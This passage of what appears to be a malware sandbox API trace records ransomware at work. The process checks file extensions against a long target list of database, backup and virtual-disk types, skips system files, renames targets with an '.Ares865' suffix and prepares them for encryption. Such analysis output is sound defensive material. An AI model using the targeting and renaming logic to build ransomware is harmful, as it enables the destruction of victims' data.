(lpString="fcd") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="fcd") returned 1 [0061.668] lstrlenW (lpString="fdb") returned 3 [0061.668] lstrcmpiW (lpString1="jrs", lpString2="fdb") returned 1 [0061.669] lstrlenW (lpString="fic") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="fic") returned 1 [0061.669] lstrlenW (lpString="flexolibrary") returned 12 [0061.669] lstrcmpiW (lpString1="res00001.jrs", lpString2="flexolibrary") returned 1 [0061.669] lstrlenW (lpString="fm5") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="fm5") returned 1 [0061.669] lstrlenW (lpString="fmp") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="fmp") returned 1 [0061.669] lstrlenW (lpString="fmp12") returned 5 [0061.669] lstrcmpiW (lpString1="1.jrs", lpString2="fmp12") returned -1 [0061.669] lstrlenW (lpString="fmpsl") returned 5 [0061.669] lstrcmpiW (lpString1="1.jrs", lpString2="fmpsl") returned -1 [0061.669] lstrlenW (lpString="fol") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="fol") returned 1 [0061.669] lstrlenW (lpString="fp3") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="fp3") returned 1 [0061.669] lstrlenW (lpString="fp4") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="fp4") returned 1 [0061.669] lstrlenW (lpString="fp5") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="fp5") returned 1 [0061.669] lstrlenW (lpString="fp7") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="fp7") returned 1 [0061.669] lstrlenW (lpString="fpt") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="fpt") returned 1 [0061.669] lstrlenW (lpString="frm") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="frm") returned 1 [0061.669] lstrlenW (lpString="gdb") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="gdb") returned 1 [0061.669] lstrlenW (lpString="gdb") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="gdb") returned 1 [0061.669] lstrlenW (lpString="grdb") returned 4 [0061.669] lstrcmpiW (lpString1=".jrs", lpString2="grdb") returned -1 [0061.669] lstrlenW (lpString="gwi") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="gwi") returned 1 [0061.669] lstrlenW (lpString="hdb") returned 3 [0061.669] lstrcmpiW (lpString1="jrs", lpString2="hdb") returned 1 [0061.669] lstrlenW (lpString="his") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="his") returned 1 [0061.670] lstrlenW (lpString="ib") returned 2 [0061.670] lstrcmpiW (lpString1="rs", lpString2="ib") returned 1 [0061.670] lstrlenW (lpString="idb") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="idb") returned 1 [0061.670] lstrlenW (lpString="ihx") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="ihx") returned 1 [0061.670] lstrlenW (lpString="itdb") returned 4 [0061.670] lstrcmpiW (lpString1=".jrs", lpString2="itdb") returned -1 [0061.670] lstrlenW (lpString="itw") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="itw") returned 1 [0061.670] lstrlenW (lpString="jet") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="jet") returned 1 [0061.670] lstrlenW (lpString="jtx") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="jtx") returned -1 [0061.670] lstrlenW (lpString="kdb") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="kdb") returned -1 [0061.670] lstrlenW (lpString="kexi") returned 4 [0061.670] lstrcmpiW (lpString1=".jrs", lpString2="kexi") returned -1 [0061.670] lstrlenW (lpString="kexic") returned 5 [0061.670] lstrcmpiW (lpString1="1.jrs", lpString2="kexic") returned -1 [0061.670] lstrlenW (lpString="kexis") returned 5 [0061.670] lstrcmpiW (lpString1="1.jrs", lpString2="kexis") returned -1 [0061.670] lstrlenW (lpString="lgc") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="lgc") returned -1 [0061.670] lstrlenW (lpString="lwx") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="lwx") returned -1 [0061.670] lstrlenW (lpString="maf") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="maf") returned -1 [0061.670] lstrlenW (lpString="maq") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="maq") returned -1 [0061.670] lstrlenW (lpString="mar") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="mar") returned -1 [0061.670] lstrlenW (lpString="marshal") returned 7 [0061.670] lstrcmpiW (lpString1="001.jrs", lpString2="marshal") returned -1 [0061.670] lstrlenW (lpString="mas") returned 3 [0061.670] lstrcmpiW (lpString1="jrs", lpString2="mas") returned -1 [0061.670] lstrlenW (lpString="mav") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="mav") returned -1 [0061.671] lstrlenW (lpString="maw") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="maw") returned -1 [0061.671] lstrlenW (lpString="mdbhtml") returned 7 [0061.671] lstrcmpiW (lpString1="001.jrs", lpString2="mdbhtml") returned -1 [0061.671] lstrlenW (lpString="mdn") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="mdn") returned -1 [0061.671] lstrlenW (lpString="mdt") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="mdt") returned -1 [0061.671] lstrlenW (lpString="mfd") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="mfd") returned -1 [0061.671] lstrlenW (lpString="mpd") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="mpd") returned -1 [0061.671] lstrlenW (lpString="mrg") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="mrg") returned -1 [0061.671] lstrlenW (lpString="mud") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="mud") returned -1 [0061.671] lstrlenW (lpString="mwb") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="mwb") returned -1 [0061.671] lstrlenW (lpString="myd") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="myd") returned -1 [0061.671] lstrlenW (lpString="ndf") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="ndf") returned -1 [0061.671] lstrlenW (lpString="nnt") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="nnt") returned -1 [0061.671] lstrlenW (lpString="nrmlib") returned 6 [0061.671] lstrcmpiW (lpString1="01.jrs", lpString2="nrmlib") returned -1 [0061.671] lstrlenW (lpString="ns2") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="ns2") returned -1 [0061.671] lstrlenW (lpString="ns3") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="ns3") returned -1 [0061.671] lstrlenW (lpString="ns4") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="ns4") returned -1 [0061.671] lstrlenW (lpString="nsf") returned 3 [0061.671] lstrcmpiW (lpString1="jrs", lpString2="nsf") returned -1 [0061.671] lstrlenW (lpString="nv") returned 2 [0061.671] lstrcmpiW (lpString1="rs", lpString2="nv") returned 1 [0061.671] lstrlenW (lpString="nv2") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="nv2") returned -1 [0061.672] lstrlenW (lpString="nwdb") returned 4 [0061.672] lstrcmpiW (lpString1=".jrs", lpString2="nwdb") returned -1 [0061.672] lstrlenW (lpString="nyf") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="nyf") returned -1 [0061.672] lstrlenW (lpString="odb") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="odb") returned -1 [0061.672] lstrlenW (lpString="odb") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="odb") returned -1 [0061.672] lstrlenW (lpString="oqy") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="oqy") returned -1 [0061.672] lstrlenW (lpString="ora") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="ora") returned -1 [0061.672] lstrlenW (lpString="orx") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="orx") returned -1 [0061.672] lstrlenW (lpString="owc") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="owc") returned -1 [0061.672] lstrlenW (lpString="p96") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="p96") returned -1 [0061.672] lstrlenW (lpString="p97") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="p97") returned -1 [0061.672] lstrlenW (lpString="pan") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="pan") returned -1 [0061.672] lstrlenW (lpString="pdb") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="pdb") returned -1 [0061.672] lstrlenW (lpString="pdm") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="pdm") returned -1 [0061.672] lstrlenW (lpString="pnz") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="pnz") returned -1 [0061.672] lstrlenW (lpString="qry") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="qry") returned -1 [0061.672] lstrlenW (lpString="qvd") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="qvd") returned -1 [0061.672] lstrlenW (lpString="rbf") returned 3 [0061.672] lstrcmpiW (lpString1="jrs", lpString2="rbf") returned -1 [0061.672] lstrlenW (lpString="rctd") returned 4 [0061.672] lstrcmpiW (lpString1=".jrs", lpString2="rctd") returned -1 [0061.672] lstrlenW (lpString="rod") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="rod") returned -1 [0061.673] lstrlenW (lpString="rodx") returned 4 [0061.673] lstrcmpiW (lpString1=".jrs", lpString2="rodx") returned -1 [0061.673] lstrlenW (lpString="rpd") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="rpd") returned -1 [0061.673] lstrlenW (lpString="rsd") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="rsd") returned -1 [0061.673] lstrlenW (lpString="sas7bdat") returned 8 [0061.673] lstrcmpiW (lpString1="0001.jrs", lpString2="sas7bdat") returned -1 [0061.673] lstrlenW (lpString="sbf") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="sbf") returned -1 [0061.673] lstrlenW (lpString="scx") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="scx") returned -1 [0061.673] lstrlenW (lpString="sdb") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="sdb") returned -1 [0061.673] lstrlenW (lpString="sdc") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="sdc") returned -1 [0061.673] lstrlenW (lpString="sdf") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="sdf") returned -1 [0061.673] lstrlenW (lpString="sis") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="sis") returned -1 [0061.673] lstrlenW (lpString="spq") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="spq") returned -1 [0061.673] lstrlenW (lpString="te") returned 2 [0061.673] lstrcmpiW (lpString1="rs", lpString2="te") returned -1 [0061.673] lstrlenW (lpString="teacher") returned 7 [0061.673] lstrcmpiW (lpString1="001.jrs", lpString2="teacher") returned -1 [0061.673] lstrlenW (lpString="tmd") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="tmd") returned -1 [0061.673] lstrlenW (lpString="tps") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="tps") returned -1 [0061.673] lstrlenW (lpString="trc") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="trc") returned -1 [0061.673] lstrlenW (lpString="trc") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="trc") returned -1 [0061.673] lstrlenW (lpString="trm") returned 3 [0061.673] lstrcmpiW (lpString1="jrs", lpString2="trm") returned -1 [0061.674] lstrlenW (lpString="udb") returned 3 [0061.674] lstrcmpiW (lpString1="jrs", lpString2="udb") returned -1 [0061.674] lstrlenW (lpString="udl") returned 3 [0061.674] lstrcmpiW (lpString1="jrs", lpString2="udl") returned -1 [0061.674] lstrlenW (lpString="usr") returned 3 [0061.674] lstrcmpiW (lpString1="jrs", lpString2="usr") returned -1 [0061.674] lstrlenW (lpString="v12") returned 3 [0061.674] lstrcmpiW (lpString1="jrs", lpString2="v12") returned -1 [0061.674] lstrlenW (lpString="vis") returned 3 [0061.674] lstrcmpiW (lpString1="jrs", lpString2="vis") returned -1 [0061.674] lstrlenW (lpString="vpd") returned 3 [0061.674] lstrcmpiW (lpString1="jrs", lpString2="vpd") returned -1 [0061.674] lstrlenW (lpString="vvv") returned 3 [0061.674] lstrcmpiW (lpString1="jrs", lpString2="vvv") returned -1 [0061.674] lstrlenW (lpString="wdb") returned 3 [0061.674] lstrcmpiW (lpString1="jrs", lpString2="wdb") returned -1 [0061.674] lstrlenW (lpString="wmdb") returned 4 [0061.674] lstrcmpiW (lpString1=".jrs", lpString2="wmdb") returned -1 [0061.674] lstrlenW (lpString="wrk") returned 3 [0061.674] lstrcmpiW (lpString1="jrs", lpString2="wrk") returned -1 [0061.674] lstrlenW (lpString="xdb") returned 3 [0061.674] lstrcmpiW (lpString1="jrs", lpString2="xdb") returned -1 [0061.674] lstrlenW (lpString="xld") returned 3 [0061.674] lstrcmpiW (lpString1="jrs", lpString2="xld") returned -1 [0061.674] lstrlenW (lpString="xmlff") returned 5 [0061.674] lstrcmpiW (lpString1="1.jrs", lpString2="xmlff") returned -1 [0061.674] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edbres00001.jrs.Ares865") returned 83 [0061.674] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edbres00001.jrs"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edbres00001.jrs.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edbres00001.jrs.ares865"), dwFlags=0x1) returned 1 [0061.684] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edbres00001.jrs.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edbres00001.jrs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0061.684] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2097152) returned 1 [0061.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0061.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0061.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0061.684] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0061.685] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0061.685] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0061.685] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x200300, lpName=0x0) returned 0x164 [0061.690] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x300) returned 0x1a0000 [0061.690] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3450000 [0062.280] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0062.280] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0062.281] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0062.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0062.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0062.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0062.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0062.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0062.281] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0062.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0062.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0062.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0062.281] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0062.281] CloseHandle (hObject=0x164) returned 1 [0062.281] CloseHandle (hObject=0x154) returned 1 [0062.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0062.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0062.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0062.294] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2216575, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0062.294] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.294] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="aoldtz.exe") returned 1 [0062.294] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".") returned 1 [0062.294] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="..") returned 1 [0062.294] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="windows") returned -1 [0062.294] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="bootmgr") returned 1 [0062.294] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="temp") returned -1 [0062.294] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="pagefile.sys") returned -1 [0062.294] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="boot") returned 1 [0062.294] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="ids.txt") returned -1 [0062.295] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="ntuser.dat") returned -1 [0062.295] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="perflogs") returned -1 [0062.295] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="MSBuild") returned -1 [0062.295] lstrlenW (lpString="edbres00002.jrs") returned 15 [0062.295] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 75 [0062.295] lstrcpyW (in: lpString1=0x2cce478, lpString2="edbres00002.jrs" | out: lpString1="edbres00002.jrs") returned="edbres00002.jrs" [0062.295] lstrlenW (lpString="edbres00002.jrs") returned 15 [0062.295] lstrlenW (lpString="Ares865") returned 7 [0062.295] lstrcmpiW (lpString1="002.jrs", lpString2="Ares865") returned -1 [0062.295] lstrlenW (lpString=".dll") returned 4 [0062.295] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".dll") returned 1 [0062.295] lstrlenW (lpString=".lnk") returned 4 [0062.295] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".lnk") returned 1 [0062.295] lstrlenW (lpString=".ini") returned 4 [0062.295] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".ini") returned 1 [0062.295] lstrlenW (lpString=".sys") returned 4 [0062.295] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".sys") returned 1 [0062.295] lstrlenW (lpString="edbres00002.jrs") returned 15 [0062.295] lstrlenW (lpString="bak") returned 3 [0062.295] lstrcmpiW (lpString1="jrs", lpString2="bak") returned 1 [0062.295] lstrlenW (lpString="ba_") returned 3 [0062.295] lstrcmpiW (lpString1="jrs", lpString2="ba_") returned 1 [0062.295] lstrlenW (lpString="dbb") returned 3 [0062.295] lstrcmpiW (lpString1="jrs", lpString2="dbb") returned 1 [0062.295] lstrlenW (lpString="vmdk") returned 4 [0062.295] lstrcmpiW (lpString1=".jrs", lpString2="vmdk") returned -1 [0062.295] lstrlenW (lpString="rar") returned 3 [0062.295] lstrcmpiW (lpString1="jrs", lpString2="rar") returned -1 [0062.295] lstrlenW (lpString="zip") returned 3 [0062.295] lstrcmpiW (lpString1="jrs", lpString2="zip") returned -1 [0062.295] lstrlenW (lpString="tgz") returned 3 [0062.295] lstrcmpiW (lpString1="jrs", lpString2="tgz") returned -1 [0062.295] lstrlenW (lpString="vbox") returned 4 [0062.295] lstrcmpiW (lpString1=".jrs", lpString2="vbox") returned -1 [0062.295] lstrlenW (lpString="vdi") returned 3 [0062.295] lstrcmpiW (lpString1="jrs", lpString2="vdi") returned -1 [0062.295] lstrlenW (lpString="vhd") returned 3 [0062.295] lstrcmpiW (lpString1="jrs", lpString2="vhd") returned -1 [0062.296] lstrlenW (lpString="vhdx") returned 4 [0062.296] lstrcmpiW (lpString1=".jrs", lpString2="vhdx") returned -1 [0062.296] lstrlenW (lpString="avhd") returned 4 [0062.296] lstrcmpiW (lpString1=".jrs", lpString2="avhd") returned -1 [0062.296] lstrlenW (lpString="db") returned 2 [0062.296] lstrcmpiW (lpString1="rs", lpString2="db") returned 1 [0062.296] lstrlenW (lpString="db2") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="db2") returned 1 [0062.296] lstrlenW (lpString="db3") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="db3") returned 1 [0062.296] lstrlenW (lpString="dbf") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="dbf") returned 1 [0062.296] lstrlenW (lpString="mdf") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="mdf") returned -1 [0062.296] lstrlenW (lpString="mdb") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="mdb") returned -1 [0062.296] lstrlenW (lpString="sql") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="sql") returned -1 [0062.296] lstrlenW (lpString="sqlite") returned 6 [0062.296] lstrcmpiW (lpString1="02.jrs", lpString2="sqlite") returned -1 [0062.296] lstrlenW (lpString="sqlite3") returned 7 [0062.296] lstrcmpiW (lpString1="002.jrs", lpString2="sqlite3") returned -1 [0062.296] lstrlenW (lpString="sqlitedb") returned 8 [0062.296] lstrcmpiW (lpString1="0002.jrs", lpString2="sqlitedb") returned -1 [0062.296] lstrlenW (lpString="xml") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="xml") returned -1 [0062.296] lstrlenW (lpString="$er") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="$er") returned 1 [0062.296] lstrlenW (lpString="4dd") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="4dd") returned 1 [0062.296] lstrlenW (lpString="4dl") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="4dl") returned 1 [0062.296] lstrlenW (lpString="^^^") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="^^^") returned 1 [0062.296] lstrlenW (lpString="abs") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="abs") returned 1 [0062.296] lstrlenW (lpString="abx") returned 3 [0062.296] lstrcmpiW (lpString1="jrs", lpString2="abx") returned 1 [0062.297] lstrlenW (lpString="accdb") returned 5 [0062.297] lstrcmpiW (lpString1="2.jrs", lpString2="accdb") returned -1 [0062.297] lstrlenW (lpString="accdc") returned 5 [0062.297] lstrcmpiW (lpString1="2.jrs", lpString2="accdc") returned -1 [0062.297] lstrlenW (lpString="accde") returned 5 [0062.297] lstrcmpiW (lpString1="2.jrs", lpString2="accde") returned -1 [0062.297] lstrlenW (lpString="accdr") returned 5 [0062.297] lstrcmpiW (lpString1="2.jrs", lpString2="accdr") returned -1 [0062.297] lstrlenW (lpString="accdt") returned 5 [0062.297] lstrcmpiW (lpString1="2.jrs", lpString2="accdt") returned -1 [0062.297] lstrlenW (lpString="accdw") returned 5 [0062.297] lstrcmpiW (lpString1="2.jrs", lpString2="accdw") returned -1 [0062.297] lstrlenW (lpString="accft") returned 5 [0062.297] lstrcmpiW (lpString1="2.jrs", lpString2="accft") returned -1 [0062.297] lstrlenW (lpString="adb") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="adb") returned 1 [0062.297] lstrlenW (lpString="adb") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="adb") returned 1 [0062.297] lstrlenW (lpString="ade") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="ade") returned 1 [0062.297] lstrlenW (lpString="adf") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="adf") returned 1 [0062.297] lstrlenW (lpString="adn") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="adn") returned 1 [0062.297] lstrlenW (lpString="adp") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="adp") returned 1 [0062.297] lstrlenW (lpString="alf") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="alf") returned 1 [0062.297] lstrlenW (lpString="ask") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="ask") returned 1 [0062.297] lstrlenW (lpString="btr") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="btr") returned 1 [0062.297] lstrlenW (lpString="cat") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="cat") returned 1 [0062.297] lstrlenW (lpString="cdb") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="cdb") returned 1 [0062.297] lstrlenW (lpString="ckp") returned 3 [0062.297] lstrcmpiW (lpString1="jrs", lpString2="ckp") returned 1 [0062.297] lstrlenW (lpString="cma") returned 3 [0062.298] lstrcmpiW (lpString1="jrs", lpString2="cma") returned 1 [0062.298] lstrlenW (lpString="cpd") returned 3 [0062.298] lstrcmpiW (lpString1="jrs", lpString2="cpd") returned 1 [0062.298] lstrlenW (lpString="dacpac") returned 6 [0062.298] lstrcmpiW (lpString1="02.jrs", lpString2="dacpac") returned -1 [0062.298] lstrlenW (lpString="dad") returned 3 [0062.298] lstrcmpiW (lpString1="jrs", lpString2="dad") returned 1 [0062.298] lstrlenW (lpString="dadiagrams") returned 10 [0062.298] lstrcmpiW (lpString1="s00002.jrs", lpString2="dadiagrams") returned 1 [0062.298] lstrlenW (lpString="daschema") returned 8 [0062.298] lstrcmpiW (lpString1="0002.jrs", lpString2="daschema") returned -1 [0062.298] lstrlenW (lpString="db-journal") returned 10 [0062.298] lstrcmpiW (lpString1="s00002.jrs", lpString2="db-journal") returned 1 [0062.298] lstrlenW (lpString="db-shm") returned 6 [0062.298] lstrcmpiW (lpString1="02.jrs", lpString2="db-shm") returned -1 [0062.298] lstrlenW (lpString="db-wal") returned 6 [0062.298] lstrcmpiW (lpString1="02.jrs", lpString2="db-wal") returned -1 [0062.298] lstrlenW (lpString="dbc") returned 3 [0062.298] lstrcmpiW (lpString1="jrs", lpString2="dbc") returned 1 [0062.298] lstrlenW (lpString="dbs") returned 3 [0062.298] lstrcmpiW (lpString1="jrs", lpString2="dbs") returned 1 [0062.298] lstrlenW (lpString="dbt") returned 3 [0062.298] lstrcmpiW (lpString1="jrs", lpString2="dbt") returned 1 [0062.298] lstrlenW (lpString="dbv") returned 3 [0062.298] lstrcmpiW (lpString1="jrs", lpString2="dbv") returned 1 [0062.298] lstrlenW (lpString="dbx") returned 3 [0062.298] lstrcmpiW (lpString1="jrs", lpString2="dbx") returned 1 [0062.298] lstrlenW (lpString="dcb") returned 3 [0062.298] lstrcmpiW (lpString1="jrs", lpString2="dcb") returned 1 [0062.298] lstrlenW (lpString="dct") returned 3 [0062.298] lstrcmpiW 